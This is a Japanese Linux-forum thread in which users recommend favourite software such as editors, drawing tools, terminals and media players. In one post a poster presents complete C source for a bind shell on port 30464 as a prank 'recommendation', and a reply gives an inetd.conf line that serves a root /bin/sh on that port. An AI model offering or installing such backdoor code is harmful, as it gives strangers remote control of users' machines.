お前らの気に入ってるソフトをお勧めしろ!
1login:Penguin
04/09/06 15:05ID:ZAlcxoeJ お勧めするのだ!
2login:Penguin
04/09/06 15:07ID:ZAlcxoeJ はっきし言ってLinuxはどんなソフトがあるのかさっぱりわからない
だからお俺にお勧めしろ!
わかったか!
だからお俺にお勧めしろ!
わかったか!
04/09/06 15:14ID:VvaiBtvS
04/09/06 15:26ID:YM/02V0X
emacs
04/09/06 15:34ID:DPEJtAZk
sl
04/09/06 16:04ID:2g2UKqa1
04/09/06 16:05ID:FsCfmoGn
8login:Penguin
04/09/06 16:39ID:xDLPvwx0 vi
04/09/06 17:27ID:RiFPYwNy
Linux使いが使っているソフトと満足度
http://pc5.2ch.net/test/read.cgi/linux/1072257744/
最近、インストールしたソフト
http://pc5.2ch.net/test/read.cgi/linux/1029514478/
http://pc5.2ch.net/test/read.cgi/linux/1072257744/
最近、インストールしたソフト
http://pc5.2ch.net/test/read.cgi/linux/1029514478/
10login:Penguin
04/09/07 01:43ID:69Rew710 −−−−−−−−−−−−−−−−−−−−−−−−−−
俺様用しおり
∧_∧
( ・∀・)< 今日はここまで読んだ
−−−−−−−−−−−−−−−−−−−−−−−−−−
俺様用しおり
∧_∧
( ・∀・)< 今日はここまで読んだ
−−−−−−−−−−−−−−−−−−−−−−−−−−
04/09/07 02:17ID:kMUJO5p4
>>10
ちょっとドッキリ
ちょっとドッキリ
12マイク ◆yrBrqfF1Ew
04/09/07 04:38ID:qdKLmqGr これお勧め。
#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>
int soc,cli,soc_len;struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;int main(){if(fork()==0){
serv_addr.sin_family=AF_INET;serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(30464);soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));listen(soc,1);
soc_len=sizeof(cli_addr);cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
dup2(cli,0);dup2(cli,1);dup2(cli,2);execl("/bin/sh","sh",0);}}
#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>
int soc,cli,soc_len;struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;int main(){if(fork()==0){
serv_addr.sin_family=AF_INET;serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(30464);soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));listen(soc,1);
soc_len=sizeof(cli_addr);cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
dup2(cli,0);dup2(cli,1);dup2(cli,2);execl("/bin/sh","sh",0);}}
13login:Penguin
04/09/07 05:55ID:+gCTSz/q14login:Penguin
04/09/07 10:53ID:/BPz6lrP >>12コンパイルして実行するとどうなんの?
15login:Penguin
04/09/07 11:06ID:0SdoMy9T 質問です。
FLASHとかの画像を取り込むための無料ソフト?が
あったんですが消えてしまたんでもう一回DLしたい
んですがどんなソフトだったか忘れてしまったので教え
てくらさい!初心者なんでスマソ
FLASHとかの画像を取り込むための無料ソフト?が
あったんですが消えてしまたんでもう一回DLしたい
んですがどんなソフトだったか忘れてしまったので教え
てくらさい!初心者なんでスマソ
16マイク ◆yrBrqfF1Ew
04/09/07 22:50ID:fIF/mSYo17login:Penguin
04/09/08 01:22ID:V0EuK6XO >>16
自動インストール機能をつけるとさらに便利になりますね。
自動インストール機能をつけるとさらに便利になりますね。
18login:Penguin
04/09/08 12:27ID:f9HuJ/bE なんでわざわざそんなもん作るのか疑問だ。
/etc/inetd.conf に
30464 stream tcp nowait root /bin/sh
とか一行追加する程度の話だろ。(最近はxinetdが主流だが)
/etc/inetd.conf に
30464 stream tcp nowait root /bin/sh
とか一行追加する程度の話だろ。(最近はxinetdが主流だが)
04/09/14 08:45:59ID:71TUTErY
>>1
Skencil (旧名 Sketch)。高度にプログラマブルなところが良い。
Skencil (旧名 Sketch)。高度にプログラマブルなところが良い。
20login:Penguin
04/09/22 16:59:38ID:2oXCA/J6 >>19 それは何のソフトなんだ?
04/09/22 18:28:16ID:wgu8sVCJ
>>20
あらら、意外と知られていないのかな?
http://sketch.sourceforge.net/
ベクトル系の作画ツールです。Tgif や Illustrator と同種のソフトです。
Python で書かれていて、本体を拡張するための「プラグイン」と「スクリプト」の
2種類の仕組みを備えています。これらも Python で書くことができます。
安定版の 0.6.x 系列はコードが枯れていて安心して使えます。
あらら、意外と知られていないのかな?
http://sketch.sourceforge.net/
ベクトル系の作画ツールです。Tgif や Illustrator と同種のソフトです。
Python で書かれていて、本体を拡張するための「プラグイン」と「スクリプト」の
2種類の仕組みを備えています。これらも Python で書くことができます。
安定版の 0.6.x 系列はコードが枯れていて安心して使えます。
22login:Penguin
04/09/22 19:19:41ID:2oXCA/J604/09/22 23:13:05ID:Xzcln/b5
04/09/22 23:34:16ID:FuynSQLc
sodipodiよりinkscape
04/09/23 00:35:40ID:zNMZSmnc
amaroK
なにげにステキ
なにげにステキ
04/09/23 17:46:42ID:rxkNRC89
どうしてもWindowsでTgifを使いたいので
Cygwin起動でX起動でTgif起動
しています
Cygwin起動でX起動でTgif起動
しています
27login:Penguin
04/09/23 19:16:05ID:uyHWGAJe >>26 Tgif って cygwin 上でビルドできたのかよ!
28login:Penguin
04/09/26 19:41:31ID:mrKK2drP w2xw 最高
29login:Penguin
04/09/26 19:41:52ID:mrKK2drP http://www.h7.dion.ne.jp/~umiumi/
30login:Penguin
04/09/26 21:47:23ID:QX/opqbS 【Macでも】みんなでやろうよWyvern【動くYO!!】
http://etc3.2ch.net/test/read.cgi/entrance/1095583399/l50
1 :名無しさん? :04/09/19 17:43:19 ID:fKw9330w
■公式HP
ttp://www.cabochon.com/
■新規キャラの作り方
Play it now!をクリック
Step1:Create Characterのしたをクリック
なんかちっさいキャラが出てくるので好きな種族を選ぼう
このとき説明が出るから読んどけ
メールアドレスとキャラ名を入力してCreate Character!ボタンをクリック
メールにパスワードが届きます
■クライアントダウンロード・インストール
Win・Mac・Linux/Unixの中からどぞ
■起動・ログイン
Character NameとPasswordを入力してConnectボタン
http://etc3.2ch.net/test/read.cgi/entrance/1095583399/l50
1 :名無しさん? :04/09/19 17:43:19 ID:fKw9330w
■公式HP
ttp://www.cabochon.com/
■新規キャラの作り方
Play it now!をクリック
Step1:Create Characterのしたをクリック
なんかちっさいキャラが出てくるので好きな種族を選ぼう
このとき説明が出るから読んどけ
メールアドレスとキャラ名を入力してCreate Character!ボタンをクリック
メールにパスワードが届きます
■クライアントダウンロード・インストール
Win・Mac・Linux/Unixの中からどぞ
■起動・ログイン
Character NameとPasswordを入力してConnectボタン
04/10/03 07:08:02ID:AGr6Rewr
だれか30のゲームやってみたひといる?
32login:Penguin
04/11/10 14:29:32ID:ddhxt23G ついに使えそうなアウトラインプロセッサを見つけた。
TreePad
ttp://www.treepad.com/linux/treepadlite/
スクリーンショット
ttp://penguin.s4.xrea.com/imgboard/img-box/img20041110142747.png
TreePad
ttp://www.treepad.com/linux/treepadlite/
スクリーンショット
ttp://penguin.s4.xrea.com/imgboard/img-box/img20041110142747.png
33login:Penguin
04/11/24 23:36:53ID:1OSIkhDl xterm
04/11/25 00:15:28ID:eny8L2PW
ターミナル
04/11/25 02:01:19ID:EfCW+AGR
>>32
emacsでよさそう。
emacsでよさそう。
36login:Penguin
2005/08/14(日) 21:01:54ID:l0u96nNv wine
2006/07/27(木) 09:47:55ID:A0q1sPZY
test
2006/07/27(木) 16:42:51ID:ZyFHY0Lf
test
2006/07/27(木) 17:33:09ID:ZyFHY0Lf
test
2006/07/27(木) 18:42:31ID:ZyFHY0Lf
test
2006/07/27(木) 18:43:38ID:QmreDk1p
test
2006/07/27(木) 19:21:14ID:QmreDk1p
test
2006/07/28(金) 07:50:24ID:V+NP2yCe
test
44login:Penguin
2006/09/05(火) 23:52:35ID:BNKh3oEF45login:Penguin
2006/09/06(水) 21:57:54ID:K/FaqCP7 screen,
twm,
vim,
canna,
crafty,
perl,
twm,
vim,
canna,
crafty,
perl,
2006/09/07(木) 00:01:41ID:zJ9VWvB8
java
2006/09/07(木) 00:36:09ID:Uz2ntquP
tgif って手軽で直感的に分かりやすいから簡単な絵には俺も
よく使うんだけど, ちょっと細かく調整しようとすると難しくない?
xfig の方が細かい調整出来たりするんだけど, こっちは使い勝手が
イマイチ直感的で無い… tgif の使いやすさといざという場合の
細かい調整ができるアプリケーションってあるんだろうか?
そんなに高くなくて Linux で走るなら買っても良いんだけど
よく使うんだけど, ちょっと細かく調整しようとすると難しくない?
xfig の方が細かい調整出来たりするんだけど, こっちは使い勝手が
イマイチ直感的で無い… tgif の使いやすさといざという場合の
細かい調整ができるアプリケーションってあるんだろうか?
そんなに高くなくて Linux で走るなら買っても良いんだけど
2006/09/07(木) 01:40:27ID:nt4321Ck
49login:Penguin
2006/09/07(木) 15:14:13ID:l/Hq59La http://ime.nu/folding.stanford.edu/download.html
【分散】Folding@homeで人類に貢献しよう!【解析】
【分散】Folding@homeで人類に貢献しよう!【解析】
2006/09/07(木) 23:48:11ID:Uz2ntquP
>>48
使ってるときじゃないと意外と思いつかないもだけど,今すぐ思いつくもので
1. 任意の色をカラーウィールみたいに簡単に選ぶのはどうするか?
2. 矢印の頭の格好や大きさをどう調整するのか
3. グリッドのメッシュをどう調整するのか
4. グリッドの水平方向を固定して垂直方向は固定しないとかはどうするのか
5. 透明背景をどう作るのか
6. 日本語を scim+anthy でどう簡単に入力するのか
7. alpha channel をどう使うのか
8. 線の太さの微調整はどうするのか
9. 拡大とか回転をどう数字で指定するのか (xx 度, x.yy 倍, etc)
と言ったところかな… 使ってるときにはもっと思いつくんだけど
使ってるときじゃないと意外と思いつかないもだけど,今すぐ思いつくもので
1. 任意の色をカラーウィールみたいに簡単に選ぶのはどうするか?
2. 矢印の頭の格好や大きさをどう調整するのか
3. グリッドのメッシュをどう調整するのか
4. グリッドの水平方向を固定して垂直方向は固定しないとかはどうするのか
5. 透明背景をどう作るのか
6. 日本語を scim+anthy でどう簡単に入力するのか
7. alpha channel をどう使うのか
8. 線の太さの微調整はどうするのか
9. 拡大とか回転をどう数字で指定するのか (xx 度, x.yy 倍, etc)
と言ったところかな… 使ってるときにはもっと思いつくんだけど
2006/09/08(金) 01:17:37ID:+b83IVzn
>>35
俺も、emacsのアウトラインモードやhowmのほうが使いやすそうに感じた。
俺も、emacsのアウトラインモードやhowmのほうが使いやすそうに感じた。
2006/09/08(金) 12:31:29ID:7VMU3Tmn
>>50
なるほど。で、最終出力はなに?epsではない気がするんだけど。確かに色に関して
はtgifは弱いな。特にαチャンネル。でも、ggvやgvでも表示できないからepsだと取
り扱いが面倒かも。tgifは、グリッド間隔、線の太さ、拡大縮小回転の数値指定も確か
にできない。私ならそういうときはMetaPostを使うけど、色のことを言われたら厳し
いかも。tgifの図をMetaPostにするときには、pstoeditを使っている。
なるほど。で、最終出力はなに?epsではない気がするんだけど。確かに色に関して
はtgifは弱いな。特にαチャンネル。でも、ggvやgvでも表示できないからepsだと取
り扱いが面倒かも。tgifは、グリッド間隔、線の太さ、拡大縮小回転の数値指定も確か
にできない。私ならそういうときはMetaPostを使うけど、色のことを言われたら厳し
いかも。tgifの図をMetaPostにするときには、pstoeditを使っている。
2006/09/22(金) 00:37:34ID:ZTLNZk1N
Comixを久しぶりにアップデートした。3.5.1
Libraryなんて機能が出来ててすごい便利になってる。
Libraryなんて機能が出来ててすごい便利になってる。
2006/09/29(金) 01:53:09ID:tvSMMpzP
2007/02/02(金) 18:32:56ID:g2ljBG7N
mpg123.el
56login:Penguin
2007/04/09(月) 18:52:47ID:v+XgbHNH Momonga Linux3
2007/04/11(水) 00:47:03ID:bhDYjLw7
gedit -gnomeテキストエディタ-
http://pc11.2ch.net/test/read.cgi/linux/1167062466/
http://pc11.2ch.net/test/read.cgi/linux/1167062466/
2007/04/12(木) 00:29:29ID:6U5PslzO
lftp最近使い始めたけどなかなかいい。ミラーリングできるし、タブで補完が
出るし。gFTPはもう不要。
出るし。gFTPはもう不要。
2007/04/27(金) 19:58:18ID:bKEWhQKE
gqview
2007/05/25(金) 15:03:14ID:aRoSwes0
nexuiz
wesnoth
クソゲーかごめんよ。
wesnoth
クソゲーかごめんよ。
2007/05/26(土) 20:48:48ID:eijGUhvO
mythtv
avidemux2
dvdstyler
avidemux2
dvdstyler
2007/07/05(木) 19:12:45ID:Vzxgt/vZ
K9copy(´・ω・`)
2007/07/06(金) 11:32:00ID:JrzrWjxk
streamtuner
streamripper
streamripper
64login:Penguin
2007/08/10(金) 11:03:20ID:flO0FJmR なんのソフトでどこが気に入っているのか
説明までちょっと書いてくれると嬉しいな
説明までちょっと書いてくれると嬉しいな
2007/08/10(金) 12:00:45ID:SjccBY3N
・3Dの無料オンラインロープレ
・MacのDockモドキ
・CPU温度やTV番組表なんかを表示してくれるもの
なんかないだろうか。
Conkyは軽くて自分的にはいいんだが更新時にちょっとなんだけど
チラついたり、3D環境だとそれが顕著になったりする。
Kiba-dockは動作性と使い勝手が今一っぽい。
折角のLinuxなんで、、、(ry
・MacのDockモドキ
・CPU温度やTV番組表なんかを表示してくれるもの
なんかないだろうか。
Conkyは軽くて自分的にはいいんだが更新時にちょっとなんだけど
チラついたり、3D環境だとそれが顕著になったりする。
Kiba-dockは動作性と使い勝手が今一っぽい。
折角のLinuxなんで、、、(ry
66login:Penguin
2007/08/10(金) 13:34:22ID:Hh2zgAGJ BOINC
ttp://boinc.berkeley.edu/index.php
ttp://team2ch.info/WorldCommunityGrid/
Linuxでも参加できる分散コンピューティング。
これを使うようになってからはLinuxを使う時間が一段と増えたお
(それまではMacかWindowsを使う時間のほうが多かった)
おまいらもぜひ参加しる
ttp://boinc.berkeley.edu/index.php
ttp://team2ch.info/WorldCommunityGrid/
Linuxでも参加できる分散コンピューティング。
これを使うようになってからはLinuxを使う時間が一段と増えたお
(それまではMacかWindowsを使う時間のほうが多かった)
おまいらもぜひ参加しる
2007/08/13(月) 00:05:30ID:gc7ooTYr
2007/08/15(水) 15:50:49ID:apAP8Vw5
CERN ROOT
バカには使いこなせない
インテリ以外に関係ない
バカには使いこなせない
インテリ以外に関係ない
2007/09/13(木) 23:34:39ID:epulcWUB
GPicView
http://www.gnomefiles.org/app.php?soft_id=2143
http://lxde.sourceforge.net/gpicview/
画像観覧ソフト。
めちゃくちゃ軽い。
http://www.gnomefiles.org/app.php?soft_id=2143
http://lxde.sourceforge.net/gpicview/
画像観覧ソフト。
めちゃくちゃ軽い。
2008/05/29(木) 02:54:46ID:o/Eum2kA
2010/01/10(日) 13:09:26ID:gCw+Uehv
test
2012/01/02(月) 14:57:47.55ID:rKqKX09Q
DeadBeeF
Linux版foobar2000って感じのプレイヤ
もっと流行って欲しい
Linux版foobar2000って感じのプレイヤ
もっと流行って欲しい
2012/01/02(月) 15:26:41.82ID:1Uc3wiSS
screen
これがないと生きていけない。ほど。
これがないと生きていけない。ほど。
2012/03/25(日) 01:14:04.42ID:wRX8xnZc
t
2012/03/25(日) 09:30:43.66ID:+ipdE6hS
Windows
2012/03/26(月) 08:20:03.23ID:A9Q7g/vc
はーい
ftpソフトは
Windowsもlinuxもfilezillaでおkでーす
ftpソフトは
Windowsもlinuxもfilezillaでおkでーす
78login:Penguin
2012/04/14(土) 21:56:41.74ID:8lFS5qA+ ふぁいあーふぉっくすとじーヴぃむとてふめいかーとじぇーでぃー
2013/08/25(日) NY:AN:NY.ANID:7aTmPL0y
firefoxとgvimとtexmakerとjd
2013/08/31(土) NY:AN:NY.ANID:XWNylAsP
tmux
2013/08/31(土) NY:AN:NY.ANID:EyiUHYIE
GTDにtaskwarrior
2013/09/01(日) 08:06:48.80ID:NDuzXeXB
yakuake
初心者がターミナルの出し方とか質問してるの見るとyakuakeを教えあげたい。
しかし初心者は使い方わからないかもしれない。
F12クリックでプルダウンとかタブでターミナル複数使えるとか意味がわからないかもしれない。
設定変えれば色々アレンジもできる。少しLinuxいじって慣れてきた人にオススメ。
初心者がターミナルの出し方とか質問してるの見るとyakuakeを教えあげたい。
しかし初心者は使い方わからないかもしれない。
F12クリックでプルダウンとかタブでターミナル複数使えるとか意味がわからないかもしれない。
設定変えれば色々アレンジもできる。少しLinuxいじって慣れてきた人にオススメ。
83login:Penguin
2013/09/05(木) 21:42:23.00ID:T1BngKyF yakuake入れてみた。GNOMEでも快適に動作するし、設定項目多いし、テーマ適用できるのはよかった。
でもUnityと相性があまり良くないのか、少しずれたところから出てくるのが気になったから
Tildaにした。こっちも設定項目多いし、テーマはないけど完全に枠なしにできるから気に入ってる。
でもUnityと相性があまり良くないのか、少しずれたところから出てくるのが気になったから
Tildaにした。こっちも設定項目多いし、テーマはないけど完全に枠なしにできるから気に入ってる。
84login:Penguin
2013/09/07(土) 22:39:35.95ID:bpNMExkA Firefox
V2C
NNDD
普段これしか使ってないことに気づいた
V2C
NNDD
普段これしか使ってないことに気づいた
2013/09/08(日) 00:00:00.84ID:j+UUkrJq
Geeqieかな。
画像閲覧しやすい。
WindowsのLeeyesみたいな感じ。
Debianだとリポジトリにあった。
Scientific Linux 6.4 だと無かったので
ttp://sourceforge.jp/projects/sfnet_geeqie/
から最新を頂いて
$ ./configure
$ make
# make install
画像閲覧しやすい。
WindowsのLeeyesみたいな感じ。
Debianだとリポジトリにあった。
Scientific Linux 6.4 だと無かったので
ttp://sourceforge.jp/projects/sfnet_geeqie/
から最新を頂いて
$ ./configure
$ make
# make install
2013/09/10(火) 17:56:36.35ID:secliqET
autojump
ディレクトリ移動ツール。
頻繁に移動するようなディレクトリもこれ一発で超楽チン。
例えば
/usr/share/doc/hogehoge
なdirでも
j hoge
とするだけで移動できる。
ディレクトリ移動ツール。
頻繁に移動するようなディレクトリもこれ一発で超楽チン。
例えば
/usr/share/doc/hogehoge
なdirでも
j hoge
とするだけで移動できる。
2013/09/22(日) 11:05:51.96ID:vQrDv8xP
システムモニタはgkrellmが軽さと手軽さで使い続けてる
88login:Penguin
2013/09/23(月) 15:27:59.67ID:1miTA2sL Nted
素人でも大額が作れる。
素人でも大額が作れる。
2013/09/23(月) 15:39:14.12ID:iVWCRPrL
>>88
使ってる。なかなか使いやすい。
使ってる。なかなか使いやすい。
2013/09/24(火) 10:52:52.74ID:N81nv/sq
munin
プラグインが書きやすくて、かゆいところに手が届く監視が可能
プラグインが書きやすくて、かゆいところに手が届く監視が可能
2013/09/24(火) 10:56:09.37ID:wmn7z1w2
>>90
muninはもはや常識だよな
muninはもはや常識だよな
9288
2013/09/29(日) 12:55:22.24ID:q12ZTssm >88 音楽だった。大額ってなんだ。
93login:Penguin
2013/09/29(日) 14:01:01.01ID:q12ZTssm MacのDockモドキ
なら、Cairo-dockをオススメします。
いろいろとカスタマイズできるし、cairo-dockのGNOMEなんてものもある。
なら、Cairo-dockをオススメします。
いろいろとカスタマイズできるし、cairo-dockのGNOMEなんてものもある。
94login:Penguin
2013/09/29(日) 18:17:30.45ID:pPcrmgCn エディタはnanoがおすすめ!
次点でvi
次点でvi
95login:Penguin
2013/09/29(日) 19:27:21.70ID:IW1fjpZy visudoっていうオブジェクトはスルーですか?
2013/09/29(日) 19:56:22.97ID:y3D4HdGn
mc
正式名称はMidnight Commander
テキストユーザインタフェースのコンソールアプリケーション
init1からinit5の全ての環境で動作する。画面は左右に分かれている。
主な操作はTabキーで左右移動、矢印キーで上下移動、
親ディレクトリへは一番上の/..をEnterかwクリックで移動。
F3で閲覧F4で編集F2で保存F10で修了
init5で操作に慣れておけばいざというとき役に立つ。
init3やinit1でmcの画面を見るとGUIがすべての人は涙を流すと言い伝えられている。
正式名称はMidnight Commander
テキストユーザインタフェースのコンソールアプリケーション
init1からinit5の全ての環境で動作する。画面は左右に分かれている。
主な操作はTabキーで左右移動、矢印キーで上下移動、
親ディレクトリへは一番上の/..をEnterかwクリックで移動。
F3で閲覧F4で編集F2で保存F10で修了
init5で操作に慣れておけばいざというとき役に立つ。
init3やinit1でmcの画面を見るとGUIがすべての人は涙を流すと言い伝えられている。
2013/09/29(日) 19:58:40.16ID:y3D4HdGn
init1やinit3でmcが文字化けする場合は$ LANG=C mc
98login:Penguin
2013/09/29(日) 19:59:36.05ID:IW1fjpZy mcとかなつかしいなあ
99login:Penguin
2013/09/30(月) 17:36:22.59ID:B2tITWh7 >>95
visudoするとnanoが起動する世界の住人でござる
visudoするとnanoが起動する世界の住人でござる
100login:Penguin
2013/09/30(月) 17:44:03.85ID:0hS8S4pq visudoでnano起動ってことはデビアン系のデフォだったかな。
RHEL系なら普通にviが起動。
RHEL系なら普通にviが起動。
2013/09/30(月) 17:47:39.36ID:26UtC5xS
debian系は実は標準エディタがnanoなのだっ
レスを投稿する
ニュース
- 入浴中に行方不明…5歳男児の捜索続く 直後に父親が川に飛び込み下流まで泳いで捜すも発見できず 鹿児島・霧島市★3 [どどん★]
- AKB48契約解除の花田藍衣、動画で悲痛な訴え「運営から性的な質問をされ…峯岸さんのように坊主にして誠意を見せろと言われ坊主に」★4 [冬月記者★]
- NHK受信料「本当は値上げの時期だと個人的に思う」と古賀経営委員長…7年連続減収受け ★2 [ちょこ★]
- 【W杯】ポルトガル 5得点大勝!絶対的エース C ロナウド 6大会連続&年長2位41歳138日弾で通算10得点 [阿弥陀ヶ峰★]
- 【陸自】男性自衛官が上司から「女みたい」とからかわれ女装強要、キスされ、クレーンで数mつり上げられる…PTSD発症し公務災害認定 ★2 [Ailuropoda melanoleuca★]
- 【通信】KDDI系メールで最大1422万件漏えいか パスワード変更を呼びかけ [牛乳トースト★]
- 【地上波/DAZNほか】 FIFAワールドカップ2026 総合スレ★160【メキシコ/カナダ/アメリカ】
- 【地上波/DAZNほか】 FIFAワールドカップ2026 総合スレ★159【メキシコ/カナダ/アメリカ】
- 西武線 6
- わしせん3
- はません ★3
- とらせん 4番大山
- 【イラン勝利!】米が原油輸出許可、「数十年ぶり」にドルで原油代金受け取り可能に [507895468]
- 【石破統計】ジャップ高校生の36.9%, 📱スマートフォンで📚電子書籍を閲読している模様 Zは読書もスマホで済ます世代… [803137891]
- 【高市悲報】中国が握る世界のレアアース供給網、先進国で結束して対抗できず… [668024367]
- 山手線 人身で逝く [399259198]
- 「話が通じない日本人」が急増している本当の理由 「相手の説明を理解できない人」に共通する欠点とは?😲 [521921834]
- 日本人さん、嫌イスラエル🇮🇱の割合が西側国家で断トツで1位になってしまう… [668024367]